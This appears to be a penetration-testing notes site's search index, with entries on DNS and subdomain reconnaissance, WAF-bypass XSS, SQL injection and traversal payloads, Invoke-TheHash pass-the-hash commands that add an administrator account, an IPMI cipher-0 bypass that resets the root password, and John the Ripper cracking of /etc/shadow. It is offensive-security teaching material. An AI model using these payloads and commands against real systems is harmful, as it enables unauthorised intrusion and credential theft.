                        nslookup (More complete cheat sheet: nslookup)

                        # Query `A` records by submitting a domain name: default behaviour\nnslookup $TARGET\n\n# We can use the `-query` parameter to search specific resource records\n# Querying: A Records for a Subdomain\nnslookup -query=A $TARGET\n\n# Querying: PTR Records for an IP Address\nnslookup -query=PTR 31.13.92.36\n\n# Querying: ANY Existing Records\nnslookup -query=ANY $TARGET\n\n# Querying: TXT Records\nnslookup -query=TXT $TARGET\n\n# Querying: MX Records\nnslookup -query=MX $TARGET\n\n#  Specify a nameserver if needed by adding `@<nameserver/IP>` to the command\n
                        ","tags":["pentest","information gathering","web"]},{"location":"information-gathering/#25-subdomain-enumeration","title":"2.5. Subdomain enumeration","text":"

                        Using Sec wordlist:

                        for sub in $(cat /opt/useful/SecLists/Discovery/DNS/subdomains-top1million-110000.txt);do dig $sub.example.com @$ip | grep -v ';\\|SOA' | sed -r '/^\\s*$/d' | grep $sub | tee -a subdomains.txt;done\n
                        ","tags":["pentest","information gathering","web"]},{"location":"information-gathering/#sublist3r","title":"Sublist3r","text":"

                        Sublist3r enumerates ubdomains using many search engines such as Google, Yahoo, Bing, Baidu and Ask. Sublist3r also enumerates subdomains using Netcraft, Virustotal, ThreatCrowd, DNSdumpster and ReverseDNS. Easily blocked by Google.

                        python3 sublist3r.py -d example.com -o file.txt\n# -d: Specify the domain.\n# -o file.txt: It prints the results to a file\n# -b: Enable the bruteforce module. This built-in module relies on the names.txt wordlist. To find it, use: locate names.txt (you can edit it).\n\n# Select an engine for enumeration, for instance, google.\npython3 sublist3r.py -d example.com -e google\n
                        ","tags":["pentest","information gathering","web"]},{"location":"information-gathering/#fierce_1","title":"fierce","text":"
                        # Brute force subdomains with a seclist\nfierce --domain domain.com --subdomain-file fierce-hostlist.txt\n
                        ","tags":["pentest","information gathering","web"]},{"location":"information-gathering/#gobuster_2","title":"gobuster","text":"

                        Gobuster:

                        gobuster vhost -w /opt/useful/SecLists/Discovery/DNS/subdomains-top1million-5000.txt -u <exact target url>\n# vhost : Uses VHOST for brute-forcing\n# -w : Path to the wordlist\n# -u : Specify the URL\n
                        ","tags":["pentest","information gathering","web"]},{"location":"information-gathering/#wfuzz_1","title":"wfuzz","text":"

                        Wfuzz:

                        wfuzz -c --hc 404 -t 200 -u https://nunchucks.htb/ -w /usr/share/dirb/wordlists/common.txt -H \"Host: FUZZ.nunchucks.htb\" --hl 546\n# -c: Color in output\n# \u2013hc 404: Hide 404 code responses\n# -t 200: Concurrent Threads\n# -u http://nunchucks.htb/: Target URL\n# -w /usr/share/dirb/wordlists/common.txt: Wordlist \n# -H \u201cHost: FUZZ.nunchucks.htb\u201d: Header. Also with \"FUZZ\" we indicate the injection point for payloads\n# \u2013hl 546: Filter out responses with a specific number of lines. In this case, 546\n
                        ","tags":["pentest","information gathering","web"]},{"location":"information-gathering/#dnsenum_1","title":"dnsenum","text":"

                        Using dnsenum.

                        ","tags":["pentest","information gathering","web"]},{"location":"information-gathering/#bash-script-with-dig-and-seclist","title":"Bash script with dig and seclist","text":"

                        Bash script, using Sec wordlist:

                        for sub in $(cat /opt/useful/SecLists/Discovery/DNS/subdomains-top1million-110000.txt);do dig $sub.example.com @$ip | grep -v ';\\|SOA' | sed -r '/^\\s*$/d' | grep $sub | tee -a subdomains.txt;done\n
                        ","tags":["pentest","information gathering","web"]},{"location":"information-gathering/#26-vhost-enumeration","title":"2.6. VHOST enumeration","text":"

                        A virtual host (vHost) is a feature that allows several websites to be hosted on a single server.

                        There are two ways to configure virtual hosts:

                        • IP-based virtual hosting
                        • Name-based virtual hosting: The distinction for which domain the service was requested is made at the application level. For example, several domain names, such as admin.inlanefreight.htb and backup.inlanefreight.htb, can refer to the same IP. Internally on the server, these are separated and distinguished using different folders.

                        vHost Fuzzing

                        # use a vhost dictionary file\ncp /usr/share/wordlists/secLists/Discovery/DNS/namelist.txt ./vhosts\n\ncat ./vhosts | while read vhost;do echo \"\\n********\\nFUZZING: ${vhost}\\n********\";curl -s -I http://$ip -H \"HOST: ${vhost}.example.com\" | grep \"Content-Length: \";done\n

                        vHost Fuzzing with ffuf:

                        # Virtual Host enumeration\n# use a vhost dictionary file\ncp /usr/share/wordlists/secLists/Discovery/DNS/namelist.txt ./vhosts\n\nffuf -w ./vhosts -u http://$ip -H \"HOST: FUZZ.example.com\" -fs 612\n# `-w`: Path to our wordlist\n# `-u`: URL we want to fuzz\n# `-H \"HOST: FUZZ.randomtarget.com\"`: This is the `HOST` Header, and the word `FUZZ` will be used as the fuzzing point.\n# `-fs 612`: Filter responses with a size of 612, default response size in this case.\n
                        ","tags":["pentest","information gathering","web"]},{"location":"information-gathering/#26-certificate-enumeration","title":"2.6. Certificate enumeration","text":"

                        SSL/TLS certificates are another potentially valuable source of information if HTTPS is in use (for instance, in gathering information to prepare a phising attack).

                        ","tags":["pentest","information gathering","web"]},{"location":"information-gathering/#sslyze-and-sslabs","title":"sslyze and sslabs","text":"

                        For this we can use: - sslyze - ssllabs by Qalys - https://ciphersuite.info.

                        ","tags":["pentest","information gathering","web"]},{"location":"information-gathering/#nmap_4","title":"nmap","text":"

                        Also, you can use a script for nmap:

                        nmap --script ssl-enum-ciphers <HOSTNAME>\n
                        ","tags":["pentest","information gathering","web"]},{"location":"information-gathering/#virustotal","title":"virustotal","text":"

                        virustotal.

                        ","tags":["pentest","information gathering","web"]},{"location":"information-gathering/#crtsh-with-curl","title":"crt.sh with curl","text":"

                        crt.sh: it enables the verification of issued digital certificates for encrypted Internet connections. This is intended to enable the detection of false or maliciously issued certificates for a domain.

                        # Get all subdomais with that digital certificate\ncurl -s https://crt.sh/\\?q\\=example.com\\&output\\=json | jq .\n\n# Filter all by unique subdomain\ncurl -s https://crt.sh/\\?q\\=example.com\\&output\\=json | jq . | grep name | cut -d\":\" -f2 | grep -v \"CN=\" | cut -d'\"' -f2 | awk '{gsub(/\\\\n/,\"\\n\");}1;' | sort -u\n\n# With the list of unique subdomains, list all the Company hosted servers\nfor i in $(cat subdomainlist);do host $i | grep \"has address\" | grep example.com | cut -d\" \" -f4 >> ip-addresses.txt;done\n\ncurl -s \"https://crt.sh/?q=${TARGET}&output=json\" | jq -r '.[] | \"\\(.name_value)\\n\\(.common_name)\"' | sort -u > \"${TARGET}_crt.sh.txt\"\n# curl -s: Issue the request with minimal output.\n# https://crt.sh/?q=<DOMAIN>&output=json: Ask for the json output.\n# jq -r '.[]' \"\\(.name_value)\\n\\(.common_name)\"': Process the json output and print certificate's name value and common name one per line.\n# sort -u: Sort alphabetically the output provided and removes duplicates.\n\n# We also can manually perform this operation against a target using OpenSSL via:\nopenssl s_client -ign_eof 2>/dev/null <<<$'HEAD / HTTP/1.0\\r\\n\\r' -connect \"${TARGET}:${PORT}\" | openssl x509 -noout -text -in - | grep 'DNS' | sed -e 's|DNS:|\\n|g' -e 's|^\\*.*||g' | tr -d ',' | sort -u\n
                        ","tags":["pentest","information gathering","web"]},{"location":"information-gathering/#censysio","title":"censys.io","text":"

                        https://censys.io: We can navigate to https://search.censys.io/certificates or https://crt.sh and introduce the domain name of our target organization to start discovering new subdomains.

                        ","tags":["pentest","information gathering","web"]},{"location":"information-gathering/#the-harvester","title":"The Harvester","text":"

                        The Harvester: simple-to-use yet powerful and effective tool for early-stage penetration testing and red team engagements. We can use it to gather information to help identify a company's attack surface. The tool collects emails, names, subdomains, IP addresses, and URLs from various public data sources for passive information gathering. It has modules.

                        Automate the modules we want to launch:

                        1. Create a list of sources, one per line, sources.txt.

                        2. Execute:

                         cat sources.txt | while read source; do theHarvester -d \"${TARGET}\" -b $source -f \"${source}_${TARGET}\";done\n

                        3. When the process finishes, extract all the subdomains found and sort them:

                        cat *.json | jq -r '.hosts[]' 2>/dev/null | cut -d':' -f 1 | sort -u > \"${TARGET}_theHarvester.txt\"\n

                        4. Merge all the passive reconnaissance files:

                        cat facebook.com_*.txt | sort -u > facebook.com_subdomains_passive.txt\n$ cat facebook.com_subdomains_passive.txt | wc -l\n
                        ","tags":["pentest","information gathering","web"]},{"location":"information-gathering/#shodan_1","title":"Shodan","text":"

                        Shodan: Once we see which hosts can be investigated further, we can generate a list of IP addresses with a minor adjustment to the cut command and run them through Shodan.

                        for i in $(cat ip-addresses.txt);do shodan host $i;done\n

                        With this we'll get an IP list, that we can use to search for DNS records.

                        ","tags":["pentest","information gathering","web"]},{"location":"inmunity-debugger/","title":"Inmunity Debugger","text":"","tags":["python","python pentesting","tools"]},{"location":"inmunity-debugger/#installation","title":"Installation","text":"

                        https://www.immunityinc.com/products/debugger/

                        ","tags":["python","python pentesting","tools"]},{"location":"inmunity-debugger/#firefox-api-hooking-with-inmunity-debugger","title":"Firefox API hooking with Inmunity Debugger","text":"

                        Firefox uses a function called PR_Write inside a dll module called nss3.dll to write/submit data. So once the target enters his username and password and click on login button the fireforx process will call PR_Write function from nss3.dll module, if we setup a break point at that function we should see the data in clear text.

                        Reference:- https://developer.mozilla.org/en-docs/Mozilla/Projects/NSPR/Reference/PR_Write

                        ","tags":["python","python pentesting","tools"]},{"location":"input-filtering/","title":"Input filtering","text":"

                        Input Filtering involves validating and sanitizing data received by the web application from users or external sources. Input filtering helps prevent security vulnerabilities such as SQL injection, cross-site scripting (XSS), and command injection. Some common techniques for input filtering include data validation, input validation, and input sanitization:

                        • Data Validation: Data validation checks whether the incoming data conforms to expected formats and constraints. Example: an email field.
                        • Input Validation: Input validation goes a step further by not only checking data formats but also assessing data for potential security threats. It detects and rejects input that could be used for attacks, such as SQL injection payloads or malicious scripts.
                        • Input Sanitization: Input sanitization involves cleaning or escaping input data to remove or neutralize potentially dangerous characters or content.
                        "},{"location":"input-filtering/#input-filtering-techniques","title":"Input filtering techniques","text":"
                        • Content Security Policy (CSP): CSP is a security feature that controls which sources of content are allowed to be loaded by a web page. It helps prevent XSS attacks by specifying which domains are permitted sources for scripts, styles, images, and other resources.
                        • Cross-Site Request Forgery (CSRF) Protection: Filtering mechanisms can be used to implement CSRF protection, ensuring that incoming requests have valid anti-CSRF tokens to prevent attackers from tricking users into performing actions they didn't intend.
                        • Web Application Firewalls (WAFs): WAFs are security appliances or services that filter incoming HTTP requests to a web application. They use predefined rules and heuristics to detect and block malicious traffic.
                        • Regular Expression Filtering: Regular expressions (regex) can be used to filter and validate data against complex patterns. However, improper regex usage can introduce security vulnerabilities, so careful crafting and testing of regex patterns are necessary.
                        "},{"location":"input-filtering/#evasion-techniques","title":"Evasion techniques","text":"

                        Web application defense mechanisms are proactive tools and techniques designed to protect and defend web applications against various security threats and vulnerabilities.

                        Evasion in web application security testing refers to the practice of using various techniques and methods to bypass or circumvent security mechanisms and controls put in place to protect a web application.

                        "},{"location":"input-filtering/#bypass-what","title":"Bypass what!","text":"
                        • Authentication: Authentication mechanisms verify the identity of users and ensure that they have the appropriate permissions to access specific resources within the application. Common authentication methods include username and password, multi-factor authentication (MFA), and biometrics.
                        • Authorization: Authorization mechanisms determine what actions and resources users are allowed to access within the application once they have been authenticated. This includes defining roles, permissions, and access controls.
                        • Input Validation/Filtering: Input validation is the process of verifying and sanitizing data received from users or external sources to prevent malicious input that could lead to vulnerabilities like SQL injection, cross-site scripting (XSS), or command injection.
                        • Session Management: Session management mechanisms are responsible for creating, managing, and securing user sessions. They include measures like session timeouts, secure session tokens, and protection against session fixation attacks.
                        • Cross-Site Request Forgery (CSRF) Protection: CSRF protection mechanisms prevent attackers from tricking users into making unauthorized requests to the application on their behalf. Tokens and anti-CSRF measures are often used for this purpose.
                        • Security Headers: HTTP security headers like Content Security Policy (CSP), X-Content-Type-Options, and X-Frame-Options are used to control how web browsers should handle various aspects of web page security and rendering.
                        • Rate Limiting: Rate limiting mechanisms restrict the number of requests a user or IP address can make to the application within a specific time frame. This helps prevent brute force attacks and DDoS attempts.
                        • Web Application Firewalls (WAFs): WAFs are security appliances or software solutions that sit between the web application and the client to monitor and filter incoming traffic. They can detect and block common web application attacks, such as SQL injection, cross-site scripting (XSS), and application-layer DDoS attacks.
                        • Intrusion Detection Systems (IDS) and Intrusion Prevention Systems (IPS): IDS and IPS solutions inspect network and application traffic for signs of suspicious or malicious activity. IDS detects and alerts on potential threats, while IPS can take proactive measures to block or prevent malicious traffic.
                        • Proxies: In the context of web applications, proxies refer to intermediary servers that facilitate communication between a user's browser and the web server hosting the application. These proxies can serve various purposes, ranging from enhancing security and privacy to optimizing performance and managing network traffic.
                        "},{"location":"input-filtering/#bypass-how","title":"Bypass how!","text":"
                        • Bypassing Web Application Firewalls (WAFs)/Proxy Rules: WAFs and proxies are designed to filter out malicious requests and prevent attacks like SQL injection or cross-site scripting (XSS). Evasion techniques may involve encoding, obfuscation, or fragmentation of malicious payloads to bypass the WAF's detection rules.
                        • Evading Intrusion Detection Systems (IDS): IDS systems monitor network traffic for signs of malicious activity. Evasion techniques can be used to hide or modify the payload of an attack so that it goes undetected by the IDS.
                        "},{"location":"input-filtering/#solutions-for-implementing-input-filtering","title":"Solutions for implementing input filtering","text":"

                        WAFs. An well known open source solution is ModSecurity. WAFs use rules to indicate what a filter must block or allow. These rules use Regular Expressions (RE or RegEx).

                        See notes on regex.

                        The best solution for protecting a webapp is whitelisting. But blacklisting methods are commonly found in deployments. Blacklisting includes a collection of well-known attacks. There are WAF bypasses.

                        "},{"location":"input-filtering/#waf-bypasses","title":"WAF bypasses","text":"
                        ################\n# XSS: alert('xss') and alert(1)\n################\nprompt('xss')\nprompt(8)\nconfirm('xss')\nconfirm(8)\nalert(/xss/.source)\nwindow[/alert/.source](8)\n\n################\n# XSS: alert(document.cookie)\n################\nwith(document)alert(cookie)\nalert(document['cookie'])\nalert(document[/cookie/.source])\nalert(document[(/coo/.source+/kie/.source])\n\n################\n# XSS: <img src=x onerror=alert(1);>\n################\n<svg/onload=alert(1)>\n<video src=x onerror=alert(1);>\n<audio src=x onerror=alert(1);>\n\n\n################\n# XSS: javascript:alert(document.cookie)\n################\ndata:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4=\n
                        ################\n# Blind SQL injection: 'or 1=1\n################\n' or 6=6\n' or 0x47=0x47\nor char(32)=''\nor 6 is not null\n\n################\n# Blind SQL injection: 'or 1=1\n################\n\nUNION ALL SELECT\n
                        ################\n#  Directory Traversals: /etc/passwd\n################\n/too/../etc/far/../passwd\n/etc//passwd\n/etc/ignore/../passwd\n/etc/passwd.......\n
                        ################\n#  Webshells: c99.php, r57.php, shell.aspx, cmd.jsp, CmdAsp.asp\n################\naugh.php\n
                        "},{"location":"input-filtering/#fingerprinting-a-waf","title":"Fingerprinting a WAF","text":"

                        Tools: wafw00f and nmap script:

                        nmap -p 80 -script http-waf-detect $ip \nnmap -p 80 -script http-waf-fingerprint $ip \n

                        Detecting a WAF manually

                        1. Cookies: Via cookie values.

                        WAF Cookie value Citrix netscaler ns_af, citrix_ns_id, NSC_ F5 BIG-IP ASM TS followed by a string with the regex:^TS[a-zA-Z0-9]{3,6} Barracuda barra_counter_session, BNi__BARRACUDA_LB_COOKIE

                        2. Server cloaking: WAFs can rewrite Server header to deceive attackers.

                        3. Response codes: WAFs can also modify the HTTP response codes if the request is hostile.

                        4. WAFs can be displayed in response bodies, like for instance mod_security, AQTRONIX WebKnight, dotDefender.

                        5. Drop Action: WAFs can close the connections in the case they detect a malicious request.

                        "},{"location":"input-filtering/#client-side-filters","title":"Client-side filters","text":""},{"location":"input-filtering/#firefox","title":"Firefox","text":"

                        Browser addons such as NoScript is a whitelist-based security tool that basically disables all the executable web content (javascript, java, flash, silverlight...) and lets the user choose which sites are \"trusted\". Nice feature: anti-XSS protection.

                        "},{"location":"input-filtering/#internet-explorer","title":"Internet explorer","text":"

                        Internet Explorer, XSS Filter, which modifies reflected values in the following way:

                        # This payload\n<svg/onload=alert(1)>\n# is transformed to\n<svg/#nload=alert(1)>\n

                        XSS Filter is enabled by default in the Internet but websites that want to opt-out of this protection can use the following response header:

                        X-XSS-Protection:0\n

                        Later on the Internet Explorer team introduced a new directive in the X-XSS-Protection header:

                        X-XSS-Protection:1; mode=block\n

                        With this directive, if a potential XSS attack is detected, the browser, rather than attempting to sanitize the page, will render a simple #. This directive has been implemented in other browsers.

                        "},{"location":"input-filtering/#chrome","title":"Chrome","text":"

                        Chrome has XSS Auditor. XSS Auditor is between the HTML Parser and the JS engine.

                        The filter analyzes both the inbound requests and the outbound. If executable code is found within the response, then it stops the script and generates a console alert.

                        "},{"location":"interactsh/","title":"Interactsh - An alternative to BurpSuite Collaborator","text":"

                        Interactsh is an open-source tool for detecting out-of-band interactions. It is a tool designed to detect vulnerabilities that cause external interactions.

                        Website version: https://app.interactsh.com/

                        ","tags":["web pentesting","proxy","servers","burpsuite","tools"]},{"location":"interactsh/#installation","title":"Installation","text":"

                        Download from: https://github.com/projectdiscovery/interactsh/

                        go install -v github.com/projectdiscovery/interactsh/cmd/interactsh-client@latest\n
                        ","tags":["web pentesting","proxy","servers","burpsuite","tools"]},{"location":"interactsh/#basic-usage","title":"Basic Usage","text":"
                        interactsh-client   \n

                        Cry for help:

                        interactsh-client  -h\n

                        Interactsh server runs multiple services and captures all the incoming requests. To host an instance of interactsh-server, you are required to setup:

                        1. Domain name with custom host names and nameservers.
                        2. Basic droplet running 24/7 in the background.
                        ","tags":["web pentesting","proxy","servers","burpsuite","tools"]},{"location":"interactsh/#burpsuite-integrated","title":"Burpsuite integrated","text":"

                        interactsh-collaborator is Burp Suite extension developed and maintained by @wdahlenb

                        ","tags":["web pentesting","proxy","servers","burpsuite","tools"]},{"location":"invoke-the-hash/","title":"Invoke-TheHash","text":"

                        Collection of PowerShell functions for performing Pass the Hash attacks with WMI and SMB. WMI and SMB connections are accessed through the .NET TCPClient. Authentication is performed by passing an NTLM hash into the NTLMv2 authentication protocol. Local administrator privileges are not required client-side, but the user and hash we use to authenticate need to have administrative rights on the target computer.

                        ","tags":["windows","dump hashes","passwords","pass the hash attack"]},{"location":"invoke-the-hash/#installation","title":"Installation","text":"

                        Download Powershell Invoke-TheHash fuctions from github repo:https://github.com/Kevin-Robertson/Invoke-TheHash.

                        When using Invoke-TheHash, we have two options: SMB or WMI command execution.

                        cd C:\\tools\\Invoke-TheHash\\\n\nImport-Module .\\Invoke-TheHash.psd1\n
                        ","tags":["windows","dump hashes","passwords","pass the hash attack"]},{"location":"invoke-the-hash/#invoke-thehash-with-smb","title":"Invoke-TheHash with SMB","text":"
                        Invoke-SMBExec -Target $ip -Domain <DOMAIN> -Username <USERNAME> -Hash 64F12CDDAA88057E06A81B54E73B949B -Command \"net user mark Password123 /add && net localgroup administrators mark /add\" -Verbose\n# Command to execute on the target. If a command is not specified, the function will check to see if the username and hash have access to WMI on the target.\n# we can execute `Invoke-TheHash` to execute our PowerShell reverse shell script in the target computer.\n

                        How to generate a reverse shell.

                        ","tags":["windows","dump hashes","passwords","pass the hash attack"]},{"location":"invoke-the-hash/#invoke-thehash-with-wmi","title":"Invoke-TheHash with WMI","text":"
                        Invoke-WMIExec -Target $machineName -Domain <DOMAIN> -Username <USERNAME> -Hash 64F12CDDAA88057E06A81B54E73B949B -Command  \"net user mark Password123 /add && net localgroup administrators mark /add\" \n

                        How to generate a reverse shell.

                        ","tags":["windows","dump hashes","passwords","pass the hash attack"]},{"location":"ipmitool/","title":"IPMItool","text":"","tags":["pentesting","port 623","ipmi"]},{"location":"ipmitool/#ipmi-authentication-bypass-via-cipher-0","title":"IPMI Authentication Bypass via Cipher 0","text":"

                        Dan Farmer identified a serious failing of the IPMI 2.0 specification, namely that cipher type 0, an indicator that the client wants to use clear-text authentication, actually allows access with any password. Cipher 0 issues were identified in HP, Dell, and Supermicro BMCs, with the issue likely encompassing all IPMI 2.0 implementations.

                        use auxiliary/scanner/ipmi/ipmi_cipher_zero\n

                        Abuse this flaw with ipmitool:

                        # Install\napt-get install ipmitool \n\n# Use Cipher 0 to dump a list of users. With -C 0 any password is accepted\nipmitool -I lanplus -C 0 -H  $ip -U root -P root user list \n\n# Change the password of root\nipmitool -I lanplus -C 0 -H $ip -U root -P root user set password 2 abc123 \n
                        ","tags":["pentesting","port 623","ipmi"]},{"location":"jaws/","title":"JAWS - Just Another Windows (Enum) Script","text":"","tags":["pentesting","windows pentesting","enumeration"]},{"location":"jaws/#installation","title":"Installation","text":"

                        Github repo: https://github.com/411Hall/JAWS.

                        ","tags":["pentesting","windows pentesting","enumeration"]},{"location":"jaws/#basis-usage","title":"Basis usage","text":"

                        Run from within CMD shell and write out to file.

                        CMD C:\\temp> powershell.exe -ExecutionPolicy Bypass -File .\\jaws-enum.ps1 -OutputFilename JAWS-Enum.txt\n

                        Run from within CMD shell and write out to screen.

                        CMD C:\\temp> powershell.exe -ExecutionPolicy Bypass -File .\\jaws-enum.ps1\n

                        Run from within PS Shell and write out to file.

                        PS C:\\temp> .\\jaws-enum.ps1 -OutputFileName Jaws-Enum.txt\n
                        ","tags":["pentesting","windows pentesting","enumeration"]},{"location":"john-the-ripper/","title":"John the Ripper - A hash cracker and dictionary attack tool","text":"

                        John the Ripper (JTR or john) is one of those tools that can be used for several things: you can crack a hash and you can crack a file.

                        ","tags":["pentesting","brute force","dictionary attack","enumeration"]},{"location":"john-the-ripper/#installation","title":"Installation","text":"

                        Download from: https://www.openwall.com/john/.

                        --list=formats // gives you a list of the formats

                        ","tags":["pentesting","brute force","dictionary attack","enumeration"]},{"location":"john-the-ripper/#crack-a-hash","title":"Crack a hash","text":"","tags":["pentesting","brute force","dictionary attack","enumeration"]},{"location":"john-the-ripper/#hash-single-crack-mode-attack","title":"Hash: Single Crack Mode attack","text":"
                        john --format=sha256 hashes_to_crack.txt\n# --format=sha256: specifies that the hash format is SHA-256\n# hashes_to_crack.txt:  is the file name containing the hashes to be cracked \n

                        John will output the cracked passwords to the console and the file \"john.pot\" (~/.john/john.pot) to the current user's home directory.

                        Furthermore, it will continue cracking the remaining hashes in the background, and we can check the progress by running:

                        john --show \n

                        Cheat sheet:

                        Hash Format Example Command Description afs john --format=afs hashes_to_crack.txt AFS (Andrew File System) password hashes bfegg john --format=bfegg hashes_to_crack.txt bfegg hashes used in Eggdrop IRC bots bf john --format=bf hashes_to_crack.txt Blowfish-based crypt(3) hashes bsdi john --format=bsdi hashes_to_crack.txt BSDi crypt(3) hashes crypt(3) john --format=crypt hashes_to_crack.txt Traditional Unix crypt(3) hashes des john --format=des hashes_to_crack.txt Traditional DES-based crypt(3) hashes dmd5 john --format=dmd5 hashes_to_crack.txt DMD5 (Dragonfly BSD MD5) password hashes dominosec john --format=dominosec hashes_to_crack.txt IBM Lotus Domino 6/7 password hashes EPiServer SID hashes john --format=episerver hashes_to_crack.txt EPiServer SID (Security Identifier) password hashes hdaa john --format=hdaa hashes_to_crack.txt hdaa password hashes used in Openwall GNU/Linux hmac-md5 john --format=hmac-md5 hashes_to_crack.txt hmac-md5 password hashes hmailserver john --format=hmailserver hashes_to_crack.txt hmailserver password hashes ipb2 john --format=ipb2 hashes_to_crack.txt Invision Power Board 2 password hashes krb4 john --format=krb4 hashes_to_crack.txt Kerberos 4 password hashes krb5 john --format=krb5 hashes_to_crack.txt Kerberos 5 password hashes LM john --format=LM hashes_to_crack.txt LM (Lan Manager) password hashes lotus5 john --format=lotus5 hashes_to_crack.txt Lotus Notes/Domino 5 password hashes md4-gen john --format=md4-gen hashes_to_crack.txt Generic MD4 password hashes md5 john --format=md5 hashes_to_crack.txt MD5 password hashes md5-gen john --format=md5-gen hashes_to_crack.txt Generic MD5 password hashes mscash john --format=mscash hashes_to_crack.txt MS Cache password hashes mscash2 john --format=mscash2 hashes_to_crack.txt MS Cache v2 password hashes mschapv2 john --format=mschapv2 hashes_to_crack.txt MS CHAP v2 password hashes mskrb5 john --format=mskrb5 hashes_to_crack.txt MS Kerberos 5 password hashes mssql05 john --format=mssql05 hashes_to_crack.txt MS SQL 2005 password hashes mssql john --format=mssql hashes_to_crack.txt MS SQL password hashes mysql-fast john --format=mysql-fast hashes_to_crack.txt MySQL fast password hashes mysql john --format=mysql hashes_to_crack.txt MySQL password hashes mysql-sha1 john --format=mysql-sha1 hashes_to_crack.txt MySQL SHA1 password hashes NETLM john --format=netlm hashes_to_crack.txt NETLM (NT LAN Manager) password hashes NETLMv2 john --format=netlmv2 hashes_to_crack.txt NETLMv2 (NT LAN Manager version 2) password hashes NETNTLM john --format=netntlm hashes_to_crack.txt NETNTLM (NT LAN Manager) password hashes NETNTLMv2 john --format=netntlmv2 hashes_to_crack.txt NETNTLMv2 (NT LAN Manager version 2) password hashes NEThalfLM john --format=nethalflm hashes_to_crack.txt NEThalfLM (NT LAN Manager) password hashes md5ns john --format=md5ns hashes_to_crack.txt md5ns (MD5 namespace) password hashes nsldap john --format=nsldap hashes_to_crack.txt nsldap (OpenLDAP SHA) password hashes ssha john --format=ssha hashes_to_crack.txt ssha (Salted SHA) password hashes NT john --format=nt hashes_to_crack.txt NT (Windows NT) password hashes openssha john --format=openssha hashes_to_crack.txt OPENSSH private key password hashes oracle11 john --format=oracle11 hashes_to_crack.txt Oracle 11 password hashes oracle john --format=oracle hashes_to_crack.txt Oracle password hashes pdf john --format=pdf hashes_to_crack.txt PDF (Portable Document Format) password hashes phpass-md5 john --format=phpass-md5 hashes_to_crack.txt PHPass-MD5 (Portable PHP password hashing framework) password hashes phps john --format=phps hashes_to_crack.txt PHPS password hashes pix-md5 john --format=pix-md5 hashes_to_crack.txt Cisco PIX MD5 password hashes po john --format=po hashes_to_crack.txt Po (Sybase SQL Anywhere) password hashes rar john --format=rar hashes_to_crack.txt RAR (WinRAR) password hashes raw-md4 john --format=raw-md4 hashes_to_crack.txt Raw MD4 password hashes raw-md5 john --format=raw-md5 hashes_to_crack.txt Raw MD5 password hashes raw-md5-unicode john --format=raw-md5-unicode hashes_to_crack.txt Raw MD5 Unicode password hashes raw-sha1 john --format=raw-sha1 hashes_to_crack.txt Raw SHA1 password hashes raw-sha224 john --format=raw-sha224 hashes_to_crack.txt Raw SHA224 password hashes raw-sha256 john --format=raw-sha256 hashes_to_crack.txt Raw SHA256 password hashes raw-sha384 john --format=raw-sha384 hashes_to_crack.txt Raw SHA384 password hashes raw-sha512 john --format=raw-sha512 hashes_to_crack.txt Raw SHA512 password hashes salted-sha john --format=salted-sha hashes_to_crack.txt Salted SHA password hashes sapb john --format=sapb hashes_to_crack.txt SAP CODVN B (BCODE) password hashes sapg john --format=sapg hashes_to_crack.txt SAP CODVN G (PASSCODE) password hashes sha1-gen john --format=sha1-gen hashes_to_crack.txt Generic SHA1 password hashes skey john --format=skey hashes_to_crack.txt S/Key (One-time password) hashes ssh john --format=ssh hashes_to_crack.txt SSH (Secure Shell) password hashes sybasease john --format=sybasease hashes_to_crack.txt Sybase ASE password hashes xsha john --format=xsha hashes_to_crack.txt xsha (Extended SHA) password hashes zip john --format=zip hashes_to_crack.txt ZIP (WinZip) password hashes","tags":["pentesting","brute force","dictionary attack","enumeration"]},{"location":"john-the-ripper/#hash-wordlist-mode-attack","title":"Hash: Wordlist mode attack","text":"
                        john --wordlist=<wordlist_file> --rules <hash_file>\n

                        Multiple wordlists can be specified by separating them with a comma.

                        ","tags":["pentesting","brute force","dictionary attack","enumeration"]},{"location":"john-the-ripper/#hash-incremental-mode-attack","title":"Hash: Incremental mode attack","text":"

                        Incremental Mode is an advanced John mode used to crack passwords using a character set. It is a hybrid attack, which means it will attempt to match the password by trying all possible combinations of characters from the character set. This mode is the most effective yet most time-consuming of all the John modes.

                        john --incremental <hash_file>\n

                        Additionally, it is important to note that the default character set is limited to a-zA-Z0-9. Therefore, if we attempt to crack complex passwords with special characters, we need to use a custom character set.

                        ","tags":["pentesting","brute force","dictionary attack","enumeration"]},{"location":"john-the-ripper/#crack-a-file","title":"Crack a file","text":"

                        For cracking files you have the following tools:

                        Tool Description pdf2john Converts PDF documents for John ssh2john Converts SSH private keys for John mscash2john Converts MS Cash hashes for John keychain2john Converts OS X keychain files for John rar2john Converts RAR archives for John pfx2john Converts PKCS#12 files for John truecrypt_volume2john Converts TrueCrypt volumes for John keepass2john Converts KeePass databases for John vncpcap2john Converts VNC PCAP files for John putty2john Converts PuTTY private keys for John zip2john Converts ZIP archives for John hccap2john Converts WPA/WPA2 handshake captures for John office2john Converts MS Office documents for John wpa2john Converts WPA/WPA2 handshakes for John

                        If you need addional ones, run:

                        locate *2john*\n
                        ","tags":["pentesting","brute force","dictionary attack","enumeration"]},{"location":"john-the-ripper/#basic-usage","title":"Basic usage","text":"
                        # Syntax. Three steps:\n# 1. Extract hash from file\n<tool> <file_to_crack> > file.hash\n# 2. Crack the hash\njohn file.hash\n# 3. Another way to crack the hash\njohn --wordlist=<wordlist.txt> file.hash \n\n# Example with a pdf:\n# 1. Extract hash from file\npdf2john server_doc.pdf > server_doc.hash\n# 2. Crack the hash\njohn server_doc.hash\n# 3. Another way to crack the hash\njohn --wordlist=<wordlist.txt> server_doc.hash \n
                        ","tags":["pentesting","brute force","dictionary attack","enumeration"]},{"location":"john-the-ripper/#brute-forcing-etcpasswd-and-etcshadow","title":"Brute forcing /etc/passwd and /etc/shadow","text":"

                        First, save /etc/passwd and john /etc/shadow from the victim machine to the attacker machine.

                        Second, use unshadow to put users and passwords in the same file:

                        unshadow passwd shadow > crackme\n# passwd: file saved with /etc/passwd content.\n# shadow: file saved with /etc/shadow content.\n

                        Third, run johtheripper. You can use a list of users or specific ones brute force:

                        john -incremental -users:<userList> <fileToCrack>\n\n# To display the passwords recovered:\njohn --show crackme\n\n# Default path to cracked password: /root/.john/john.pot\n\n# Dictionary attack\njohn -wordlist=<file> -users=victim1,victim2 -rules <filetocrack>\n# -rules parameter adds som mangling to the wordlist\n
